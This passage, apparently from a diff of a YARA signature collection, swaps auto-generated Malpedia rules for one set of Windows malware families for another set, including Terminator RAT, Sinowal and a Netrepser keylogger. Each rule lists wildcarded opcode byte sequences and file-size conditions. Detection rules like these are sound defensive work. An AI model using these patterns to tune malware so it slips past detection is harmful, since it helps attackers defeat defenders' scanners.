+		$sequence_0 = { 8b8698010000 5e c3 56 8bf1 }
+		$sequence_1 = { f3ab 8bce aa e8???????? }
+		$sequence_2 = { 33d2 eb19 8b0d???????? 2bc8 }
+		$sequence_3 = { 56 8bf1 e8???????? 8d8614010000 5e c3 }
+		$sequence_4 = { c705????????01000000 a3???????? a3???????? ff15???????? 85c0 }
+		$sequence_5 = { 33c0 5b 81c474010000 c21000 56 68???????? }
+		$sequence_6 = { 397d08 897dfc 0f8cc0000000 837d0801 7e58 837d0803 0f8fb0000000 }
+		$sequence_7 = { 8bfa 83c9ff 33c0 8d9c2498000000 }
+		$sequence_8 = { 83c302 f3a5 8bc8 83e103 f3a4 8bbc2410040000 }
+		$sequence_9 = { 51 e8???????? 83c40c 8d542400 6a01 6a00 52 }
+		$sequence_10 = { f3a4 8b0d???????? 8b15???????? 2bd1 b8abaaaa2a }
+		$sequence_11 = { e8???????? 6a00 56 ff7514 8d4de0 e8???????? 0175f0 }
+		$sequence_12 = { 8d1440 a1???????? c1e205 03d6 }
+		$sequence_13 = { 8b450c 7511 8b4dec 03c7 }
+		$sequence_14 = { 83e103 f3a4 ffd3 50 68???????? }
+		$sequence_15 = { 837d0803 0f8fb0000000 397d10 897df0 0f86a4000000 8b7d14 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Kardonloader_Auto : FILE
+rule MALPEDIA_Win_Terminator_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1fc9d8e7-57f1-59f6-8755-7f22512ea4b8"
+		id = "e470c3b5-74cd-53c3-b4cc-acdce03aa8dd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kardonloader_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.terminator_rat_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "af6ba3e21c382f2fd654060dcfde8b3eb16b50330472c81358760501218ffed8"
+		logic_hash = "0c5a38ab087b1b21acdc43ba4e7c8b1be9b6d593b69dd3e7b8053959b3c291c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104511,32 +104755,32 @@ rule MALPEDIA_Win_Kardonloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8975f8 e8???????? 84c0 ba???????? b9???????? 8d857cffffff 0f44ca }
-		$sequence_1 = { 57 ff15???????? 8bf0 83feff 0f849d000000 8d45e0 }
-		$sequence_2 = { c745f8???????? c745fc???????? ff74b5d8 ff15???????? }
-		$sequence_3 = { 59 59 85c0 0f84f7010000 56 57 }
-		$sequence_4 = { 7861 ff7510 ff7510 e8???????? 59 50 }
-		$sequence_5 = { 83c40c 894714 b001 5f 5e }
-		$sequence_6 = { c3 55 8bec 81ec00040000 8d8500fcffff 56 ff35???????? }
-		$sequence_7 = { 33c0 e9???????? 33c0 53 8b5d08 }
-		$sequence_8 = { c745f8???????? c745fc???????? ff74b5d8 ff15???????? 85c0 750a }
-		$sequence_9 = { 40 8945fc 894d08 8a01 }
+		$sequence_0 = { 53 8d8700fcffff 56 50 }
+		$sequence_1 = { 8913 83c304 49 75f3 }
+		$sequence_2 = { c0c803 3441 c0c803 aa e2e3 }
+		$sequence_3 = { 50 e8???????? 8b852d010000 8b4804 }
+		$sequence_4 = { ffb7f0fbffff 50 e8???????? 8b4604 8987fcfbffff 8d87f8fbffff 50 }
+		$sequence_5 = { 58 7506 898529010000 81c400040000 5f c3 }
+		$sequence_6 = { 56 ff5565 85c0 7403 894569 61 }
+		$sequence_7 = { c7001a010000 e8???????? 83f8ff 7405 6a01 }
+		$sequence_8 = { 5d 55 57 8bc7 83c004 837d0400 7413 }
+		$sequence_9 = { 8bfc 83ec0c 53 56 8b7708 ff77fc ffb51d010000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Gsecdump_Auto : FILE
+rule MALPEDIA_Win_Klrd_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce480a68-e8bd-5d8c-86f5-be48ddeea1ee"
+		id = "f2ac53cd-82a8-55ea-badd-f6f1aae58f93"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gsecdump_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.klrd_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "a72a04a740244a6cb1848f1152ab924ea33c81fae0f1332c81f641d1b7e5f823"
+		logic_hash = "0fc6f030ea4bb49d87359f96c6eceeeaeffbdd94bdee42030f76f2d7ec66a19a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104550,34 +104794,34 @@ rule MALPEDIA_Win_Gsecdump_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83fa10 7202 8b00 8b5314 03d0 39542430 7605 }
-		$sequence_1 = { 894134 5d c21800 8d4104 8b48fc 8b4904 c74401fc???????? }
-		$sequence_2 = { bd10000000 83c408 396c242c 720d 8b442418 50 e8???????? }
-		$sequence_3 = { c6450c00 8b550c 52 8b5510 52 }
-		$sequence_4 = { 81e3fffdffff 837dd010 895d04 720c 8b45bc 50 e8???????? }
-		$sequence_5 = { 50 8d7b10 57 51 }
-		$sequence_6 = { 57 c644242000 8b742420 56 8b742418 56 }
-		$sequence_7 = { 56 8bf0 2bf1 03f2 85c0 89742418 8d69ff }
-		$sequence_8 = { c744241c02000000 742a 8d4704 83c9ff f00fc108 751e 8b17 }
-		$sequence_9 = { e8???????? 8b4604 03c5 50 8d44241c 50 e8???????? }
+		$sequence_0 = { 8d85fcefffff 50 e8???????? 59 50 }
+		$sequence_1 = { 8d85fcefffff 50 57 ff15???????? 57 ff15???????? }
+		$sequence_2 = { e8???????? 59 50 8d85fcefffff 50 57 }
+		$sequence_3 = { 3c00 0f8485020000 3c03 0f847d020000 3c09 0f8475020000 3c08 }
+		$sequence_4 = { c685c0fdffff00 68ff000000 6a00 8d85c1fdffff 50 e8???????? 83c40c }
+		$sequence_5 = { 59 59 ff7510 ff750c ff7508 ff35???????? ff15???????? }
+		$sequence_6 = { ebcc 8a85e7feffff 8885acfcffff 80bdacfcffff08 742f }
+		$sequence_7 = { 56 56 6a04 56 56 68000000c0 68???????? }
+		$sequence_8 = { 59 8d7dec f3a5 8b45ec 25ff000000 8885e7feffff 3c00 }
+		$sequence_9 = { ffb5b0fcffff ff15???????? 8985c8feffff 83bdc8feffff00 7515 ff15???????? }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Yty_Auto : FILE
+rule MALPEDIA_Win_Session_Manager_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9e49fc42-83f5-52d0-90c6-9df681f170fe"
+		id = "c7a55698-35d0-50fe-9be2-ce1d92ad4335"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yty_auto.yar#L1-L512"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.session_manager"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.session_manager_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "24d2496487d3e8a74d1838cfbb75ce014466580ad0212ac1fc21d0ad856e5f75"
+		logic_hash = "d5175a76f3322d7804a37437b75d91825889aed645aa1d99d4aedae744a409da"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -104589,77 +104833,32 @@ rule MALPEDIA_Win_Yty_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45d8 83e001 0f840c000000 8365d8fe 8b7508 e9???????? c3 }
-		$sequence_1 = { 8d45f4 64a300000000 8b7508 33ff 897dd8 }
-		$sequence_2 = { 8a1402 2ad1 8bfe 80ea04 b901000000 e9???????? }
-		$sequence_3 = { 7303 8d5508 8b4e10 397e14 7204 8b3e }
-		$sequence_4 = { 50 e8???????? 83c40c 8d8de8fdffff 51 53 }
-		$sequence_5 = { 52 50 8b410c ffd0 8d4f08 51 }
-		$sequence_6 = { 8bfe 80ea13 b902000000 e9???????? 8b5508 397d1c 7303 }
-		$sequence_7 = { 8b35???????? 85c0 52 0f95c3 ffd6 }
-		$sequence_8 = { 50 ffd2 ff15???????? 8a857bffffff 8b4df4 }
-		$sequence_9 = { 8bfe 80ea04 b904000000 eb23 8b5508 397d1c 7303 }
-		$sequence_10 = { 8d8de8fdffff 51 53 53 6a28 53 ff15???????? }
-		$sequence_11 = { 807def00 8b5de8 7503 83cb02 8b16 }
-		$sequence_12 = { 33c0 8945f0 8906 894604 894608 8945fc 56 }
-		$sequence_13 = { 8975e0 85c9 7407 8b11 8b4204 }
-		$sequence_14 = { 668910 8bc6 5b 8be5 5d c20400 }
-		$sequence_15 = { 33db 895de8 885def 8975e0 }
-		$sequence_16 = { 397e14 7214 8a1402 8b3e 2ad1 80ea13 b902000000 }
-		$sequence_17 = { 80ea04 b901000000 e9???????? 8a1402 2ad1 8bfe }
-		$sequence_18 = { 6a01 8bcf e8???????? 8b0e 8b5104 8b443238 c645ef01 }
-		$sequence_19 = { 85d2 0f8425010000 83f904 0f8712010000 }
-		$sequence_20 = { 33c9 33c0 8d7910 85d2 }
-		$sequence_21 = { 8b07 eb02 8bc7 8b4de0 }
-		$sequence_22 = { 8ad1 c0ea02 8ac4 80e20f c0e004 }
-		$sequence_23 = { 8b4c1938 895dd4 85c9 7405 8b01 ff5004 c745fc00000000 }
-		$sequence_24 = { e8???????? 83c420 3ac3 7459 8b9dc4f5ffff 39bdd8f5ffff }
-		$sequence_25 = { 83e908 8d7608 660fd60f 8d7f08 8b048d24f94000 ffe0 f7c703000000 }
-		$sequence_26 = { 8b4604 33c9 668908 8bce }
-		$sequence_27 = { 3bf4 e8???????? 8bf4 8b4594 50 ff15???????? }
-		$sequence_28 = { 8bc7 33c9 668908 8b5d08 894dfc c745f001000000 }
-		$sequence_29 = { e8???????? 8945e8 8d45e8 50 8955ec e8???????? 8bf0 }
-		$sequence_30 = { 83c404 c645fc19 8b85a4bcf0ff c705????????01000000 83f810 7245 }
-		$sequence_31 = { 8b048dc4f14000 ffe0 f7c703000000 7413 8a06 }
-		$sequence_32 = { c74410e05c584600 8b42e0 8b4804 8d41e8 }
-		$sequence_33 = { c7858cfcffff00000000 6a40 6a00 8d8590fcffff 50 e8???????? }
-		$sequence_34 = { 8b0d???????? 83c408 2b0d???????? 8bf0 }
-		$sequence_35 = { 85c9 743f ff75f4 8b15???????? 51 }
-		$sequence_36 = { c745f32e747874 c645f700 c7458b00000000 8d458f b960000000 bb00000000 }
-		$sequence_37 = { c745e000000000 8b45f8 5f 5e 5b 81c4e4000000 3bec }
-		$sequence_38 = { 8b0c8d00b04600 807c012900 7407 32c0 e9???????? 837d1400 }
-		$sequence_39 = { c6041800 6a10 68???????? 8bce e8???????? 6aff }
-		$sequence_40 = { 8b0485a0244300 c644080401 57 e8???????? }
-		$sequence_41 = { 6bc930 8975e0 8db190f94200 8975e4 eb2b 8a4601 }
-		$sequence_42 = { 660f56fa 25ff000000 83c001 25fe010000 f20f593c85c0014600 660f122c85c0014600 }
-		$sequence_43 = { c7465c28c14200 83660800 33ff 47 }
-		$sequence_44 = { 8b5df0 33ff 8945dc 8b1c9d60cb4300 895de0 f6441a2848 8b5d08 }
-		$sequence_45 = { 0f87a4030000 ff24bda7714200 8bc6 e9???????? 8b50e4 3b51e4 7469 }
-		$sequence_46 = { 1d1d1d1d1d 1d1d1d1d1d 1d1d1d1d1d 1213 }
-		$sequence_47 = { ff15???????? 3bf4 e8???????? 8d85e8feffff 50 68???????? }
-		$sequence_48 = { eb24 a1???????? 8944240c c744240801000000 c744240401000000 8d45f3 890424 }
-		$sequence_49 = { 89542404 890424 e8???????? e8???????? a1???????? 890424 }
-		$sequence_50 = { 85c0 0f8430010000 a1???????? 890424 }
-		$sequence_51 = { a1???????? 8b5de4 895c2418 894c2414 89542410 8974240c 8b5508 }
-		$sequence_52 = { 890424 e8???????? 3b45f4 77dd }
-		$sequence_53 = { eb3d a1???????? 8b0d???????? 8b15???????? 01ca }
-		$sequence_54 = { 890424 e8???????? 8945dc 817ddce0070000 0f8ece030000 c70424???????? e8???????? }
+		$sequence_0 = { 4c89b888080000 4c89b890080000 4c89b898080000 4c89b8a0080000 4c89b8a8080000 4c89b8b0080000 }
+		$sequence_1 = { 4c89b8001a0000 4c89b8081a0000 4c89b8101a0000 4c89b8181a0000 4c89b8201a0000 4c89b8281a0000 4c89b8301a0000 }
+		$sequence_2 = { 418be8 4c8d0d66a80000 8bda 4c8d0555a80000 488bf9 }
+		$sequence_3 = { 488d5308 33c9 48890a 48894a08 488d4c2420 e8???????? 488d0542450100 }
+		$sequence_4 = { 7473 4c8d15c2f6feff 4b8b84fa80850200 f644383848 7421 8a8c2488000000 }
+		$sequence_5 = { 498b06 498bce ff5018 4c8b08 4533c0 488d15f71a0200 488bc8 }
+		$sequence_6 = { 488bd1 488bc1 48c1f806 4c8d05f4970100 83e23f 48c1e206 498b04c0 }
+		$sequence_7 = { 4c89b8481b0000 4c89b8501b0000 4c89b8581b0000 4c89b8601b0000 }
+		$sequence_8 = { 4c89b820220000 4c89b828220000 4c89b830220000 4c89b838220000 4c89b840220000 4c89b848220000 4c89b850220000 }
+		$sequence_9 = { 4c89b8781d0000 4c89b8801d0000 4c89b8881d0000 4c89b8901d0000 4c89b8981d0000 }
 
 	condition:
-		7 of them and filesize < 1097728
+		7 of them and filesize < 372736
 }
-rule MALPEDIA_Win_Greenshaitan_Auto : FILE
+rule MALPEDIA_Win_Sinowal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8f14a34e-de7f-5ea7-9fdc-322bcde7a341"
+		id = "00c85bb6-b85e-5ec4-8327-f739c9d5f422"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.greenshaitan_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sinowal_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "3cbeaa8f8745b6f3b0557ef1727b77581513ec936eac8ffdebb5493281224370"
+		logic_hash = "ad21744a631baee0751cfa9148a29030265ec00175eb1018f5bd88e3be28754b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104673,32 +104872,32 @@ rule MALPEDIA_Win_Greenshaitan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb02 33f6 8bc5 99 }
-		$sequence_1 = { 52 ff15???????? 6804010000 8d442408 50 8d8c2414020000 51 }
-		$sequence_2 = { 899fb8010000 899fbc010000 899fc0010000 899fc4010000 c644241c09 a1???????? 8b4c2428 }
-		$sequence_3 = { 89742414 85ff 7521 e8???????? 33c0 }
-		$sequence_4 = { c1e004 c1ee04 0bf0 0fb686685b6e00 41 8801 83e20f }
-		$sequence_5 = { 3974246c 720d 8b4c2458 51 e8???????? 83c404 8b542430 }
-		$sequence_6 = { 6a00 50 c744245c01000000 e8???????? 837c244410 }
-		$sequence_7 = { ff34c584916e00 53 57 e8???????? 83c40c 85c0 740d }
-		$sequence_8 = { 50 8b442420 50 51 52 57 e8???????? }
-		$sequence_9 = { 0f84d1000000 57 8bcb 8d542418 e8???????? }
+		$sequence_0 = { ff15???????? c78568fdffff18000000 c7856cfdffff00000000 c78574fdffff40000000 8d9554fdffff }
+		$sequence_1 = { 6800100000 8b4dfc 83c108 51 }
+		$sequence_2 = { 8a4dfb 884c5001 ebbf 5e 8be5 }
+		$sequence_3 = { 83c214 899564fdffff c78580fdffff14000000 8b8548fdffff 83c036 }
+		$sequence_4 = { ff15???????? 8945fc 837dfc00 7521 68???????? 6a00 6a00 }
+		$sequence_5 = { 7514 8b4510 50 8b4df8 51 }
+		$sequence_6 = { ff15???????? 85c0 7508 8b45f0 e9???????? }
+		$sequence_7 = { c745fc05400080 c745ec00000000 833d????????00 751a e8???????? }
+		$sequence_8 = { 8945e4 837de400 7502 eb0b 68e8030000 }
+		$sequence_9 = { 7418 8b55e8 3b55f8 7510 8b45ec 3b45fc 7508 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Typeframe_Auto : FILE
+rule MALPEDIA_Win_Bluehaze_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "54b5c61d-baac-5ee7-bf22-feb7211e94de"
+		id = "5c7b5561-ee2d-5a06-a96a-4cc26ae71cec"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typeframe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.typeframe_auto.yar#L1-L148"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bluehaze_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "80d5f324e45f06373a108fe4a18abca87604cdaaeb894c2ac4120a591e037164"
+		logic_hash = "108c6f0ac1c0898d4930ded73b9aadddbebc2ff25c5a1de920dfb159113df607"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104712,38 +104911,32 @@ rule MALPEDIA_Win_Typeframe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 004fb5 0500cccccc cc 48895c2410 }
-		$sequence_1 = { 002d???????? b505 00eb b405 }
-		$sequence_2 = { 004775 0300 3c75 0300 }
-		$sequence_3 = { 0026 b505 004fb5 0500cccccc }
-		$sequence_4 = { 006a0f 57 8bf0 e8???????? }
-		$sequence_5 = { 0004af 0300 f6ae0300e8ae 0300 }
-		$sequence_6 = { 01442468 8d4c0f78 83e978 8d44242c }
-		$sequence_7 = { 0056e5 0400 af e504 }
-		$sequence_8 = { 0102 0318 18040506071818 1818 }
-		$sequence_9 = { 008601010000 0fb69601010000 410fb60c30 0fb60432 }
-		$sequence_10 = { 0108 83c004 4a 75cd }
-		$sequence_11 = { 014424fc 83ec04 2bc1 58 0f83be000000 }
-		$sequence_12 = { 008501010000 410fb60c28 0fb69501010000 0fb6042a }
-		$sequence_13 = { 01442408 c74424fc00000000 014c24fc 83ec04 }
-		$sequence_14 = { 01442418 8d6c282c 83ed2c eb04 }
-		$sequence_15 = { 014424fc 83ec04 2bc2 58 720c }
+		$sequence_0 = { 83c404 89856cfeffff c645fc24 85c0 742d 8b8d78feffff 68a4010000 }
+		$sequence_1 = { c745e80f000000 8945e4 8845d4 e8???????? 56 8d45d4 50 }
+		$sequence_2 = { e8???????? 83c404 33c0 c7467c0f000000 894678 884668 8bce }
+		$sequence_3 = { 897e14 c7461000000000 c60600 83c61c 3bf3 75d8 50 }
+		$sequence_4 = { 8b5604 8b5214 68???????? 83c604 50 8d857cffffff 50 }
+		$sequence_5 = { 85c0 7567 ff15???????? 3d6d270000 7573 8d856cfeffff 50 }
+		$sequence_6 = { 59 c3 8d8d60ffffff e9???????? 8d8d7cffffff e9???????? 8d8dd4feffff }
+		$sequence_7 = { 8d45ec 50 8bf1 ff15???????? 0fb755f4 8b4dec 69d2e8030000 }
+		$sequence_8 = { 83c408 8bc8 ff15???????? 8d4d80 51 8d8d08feffff }
+		$sequence_9 = { e9???????? 8d8d78fbffff e9???????? 8b542408 8d420c 8b8a04faffff 33c8 }
 
 	condition:
-		7 of them and filesize < 2125824
+		7 of them and filesize < 424960
 }
-rule MALPEDIA_Win_Unidentified_003_Auto : FILE
+rule MALPEDIA_Win_Thumbthief_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68c73429-01e2-51c8-be95-38ace5fc7e1c"
+		id = "c07df13f-4d93-5b5e-9219-11a7b6751d3c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_003_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thumbthief_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1280401acbb116bbb5b04fa4063fd1d8d80a530174292f633236a0a89b7df590"
+		logic_hash = "48fc10818492752c11b968a2d68b30a1043a5a183785607a78ccc035f88fcdc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104757,34 +104950,34 @@ rule MALPEDIA_Win_Unidentified_003_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? c70424???????? e8???????? 59 68???????? 891d???????? 891d???????? }
-		$sequence_1 = { 83c40c 895de8 8b45ec 8b08 8d55f0 52 53 }
-		$sequence_2 = { 56 68???????? ff75f8 ff15???????? ff75dc ff7508 }
-		$sequence_3 = { 68???????? e8???????? 56 68???????? e8???????? 83c410 8bc3 }
-		$sequence_4 = { 6a00 6a00 68???????? ff55fc eb07 50 }
-		$sequence_5 = { b8???????? 85c0 7420 ff750c 53 ff7644 e8???????? }
-		$sequence_6 = { 57 8bf8 33f6 8bd9 3bfe 7502 8bfb }
-		$sequence_7 = { 53 6a01 68???????? 68???????? 56 ff15???????? 57 }
-		$sequence_8 = { 8d85d0feffff 50 6888000000 ff15???????? 894624 3bc3 }
-		$sequence_9 = { 55 8bec 81ecb4000000 53 56 57 33f6 }
+		$sequence_0 = { e8???????? 8d84246c010000 50 8d8424e4000000 50 8d842488010000 50 }
+		$sequence_1 = { f3a5 66318568feffff 66a5 8db56effffff bf0d000000 0fb74602 8d76f6 }
+		$sequence_2 = { e9???????? 8d8d2cffffff e9???????? 8d4d90 e9???????? 8d4dc4 e9???????? }
+		$sequence_3 = { e8???????? 8d8584feffff 50 e8???????? ffb594feffff 8d8da0feffff e8???????? }
+		$sequence_4 = { ff7518 68???????? 57 e8???????? 83c410 e9???????? 8b5040 }
+		$sequence_5 = { ff742438 33c0 85c9 ff7514 0f99c0 8bcf 6a00 }
+		$sequence_6 = { e8???????? c645fc06 8d8d28ffffff e8???????? c645fc07 8d8d3cffffff e8???????? }
+		$sequence_7 = { e8???????? 837db800 8945b0 0f85c0000000 8b4d9c 8b4724 8945ac }
+		$sequence_8 = { e9???????? 8d8d1cffffff e9???????? 8d8d6cffffff e9???????? 8d8d08ffffff e9???????? }
+		$sequence_9 = { 8d8c24f8000000 6a0d e8???????? 68???????? 8d8424f4000000 e9???????? 8d8424c8000000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 4235264
 }
-rule MALPEDIA_Win_Doppelpaymer_Auto : FILE
+rule MALPEDIA_Win_Smanager_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fb3d1d6a-8d0f-5691-b315-4261f48416f9"
+		id = "0adcac8e-452d-57ad-977c-a9125f7183b0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doppelpaymer_auto.yar#L1-L187"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smanager_auto.yar#L1-L223"
 		license_url = "N/A"
-		logic_hash = "5a0db62aabb073b4fe7086dc27996528fad3daef4ecf82aaa9e666c8187cc6f8"
+		logic_hash = "3f482517aa3a2ee02c64524a13e643b42a87540d5888bda3f974015b63620502"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -104796,40 +104989,46 @@ rule MALPEDIA_Win_Doppelpaymer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 80790600 7523 80790264 751d }
-		$sequence_1 = { e8???????? 8b08 e8???????? 3db6389096 }
-		$sequence_2 = { 7517 80790361 7511 80790474 750b 80790173 7505 }
-		$sequence_3 = { 83ec28 6800002002 6a00 6a01 }
-		$sequence_4 = { 80790264 751d 80790561 7517 80790361 }
-		$sequence_5 = { baffffff7f 43 e8???????? 3bd8 }
-		$sequence_6 = { 50 8d4c2454 e8???????? 8bcb e8???????? 8d4c2450 e8???????? }
-		$sequence_7 = { 50 ffd2 8bd8 8b442404 80780400 741b 8b00 }
-		$sequence_8 = { c20400 8d8d5cfdffff e8???????? 80bd50fdffff00 }
-		$sequence_9 = { c20400 8d4de8 e8???????? 8b4df4 8bf1 85c9 74ad }
-		$sequence_10 = { e8???????? 8b4dd8 890c24 8b55e8 89542404 8945bc e8???????? }
-		$sequence_11 = { 31c9 c745f469d9900b 8b5034 8b4008 8955f0 8945ec }
-		$sequence_12 = { 8b75ec 81c61d0b66d6 8b7dc0 897904 }
-		$sequence_13 = { 8945c4 74d0 e9???????? 31c0 }
-		$sequence_14 = { e8???????? 8b4de8 8b55d8 895128 }
-		$sequence_15 = { 894c2404 8945d8 e8???????? 31c0 8b4de8 8b5108 8b7134 }
-		$sequence_16 = { 8d75d1 c745f0e7566258 c645ef3c 8a1d???????? 80fb00 8945c0 894dbc }
-		$sequence_17 = { 8b7e50 897db8 8b7e3c 897dbc 8b7e10 897dc0 8b7e18 }
+		$sequence_0 = { 7410 6a00 6a00 6830001100 }
+		$sequence_1 = { 83c602 6a22 56 e8???????? 83c408 }
+		$sequence_2 = { 85f6 7417 8b0e 85c9 }
+		$sequence_3 = { 8b4510 85c0 7407 50 }
+		$sequence_4 = { 740e 3d45270000 7407 3d46270000 }
+		$sequence_5 = { 6a00 ff15???????? 8bf8 897e28 }
+		$sequence_6 = { 51 51 ffd0 83c40c c7460800000000 }
+		$sequence_7 = { 8b7604 6a00 6a00 56 68???????? 6a00 6a00 }
+		$sequence_8 = { ff15???????? 32c0 e9???????? 0f1005???????? }
+		$sequence_9 = { 0001 ce 50 0008 }
+		$sequence_10 = { e8???????? 4c8d4c2430 488d4e10 4c8bc3 }
+		$sequence_11 = { 48897c2428 48896c2420 ff15???????? 85c0 }
+		$sequence_12 = { 0007 b15a 0089b05a0089 b05a }
+		$sequence_13 = { 488d053bdc0000 488d542458 488d4c2420 41b801000000 4889442458 e8???????? 488d050adc0000 }
+		$sequence_14 = { 48895c2458 488bd9 ba02000000 488b4938 ff15???????? b90a000000 ff15???????? }
+		$sequence_15 = { 0008 53 4f 00ef }
+		$sequence_16 = { 0000 80ed4a 0044feff ff900100008c }
+		$sequence_17 = { 0003 b157 0000 0c0c }
+		$sequence_18 = { 488b05???????? 4833c4 48898570010000 4c8bf1 488d442438 4889442420 }
+		$sequence_19 = { 0007 b15a 00c4 b15a }
+		$sequence_20 = { 0007 b15a 0007 b15a }
+		$sequence_21 = { 488905???????? 4885c0 7519 488b8c2460020000 4833cc e8???????? 4881c470020000 }
+		$sequence_22 = { 4885c0 0f84a3000000 4883f80d 0f8299000000 488d70f4 488d7c2448 }
+		$sequence_23 = { 0000 0c0c 0c0c 0c0c 0c0c 0c0c 0102 }
 
 	condition:
-		7 of them and filesize < 7266304
+		7 of them and filesize < 10013696
 }
-rule MALPEDIA_Win_Poison_Rat_Auto : FILE
+rule MALPEDIA_Win_Netrepser_Keylogger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3901c97f-e38d-5819-991e-493be520fc51"
+		id = "7f57cd5d-92d6-5b8d-9329-1faf79bf30fb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
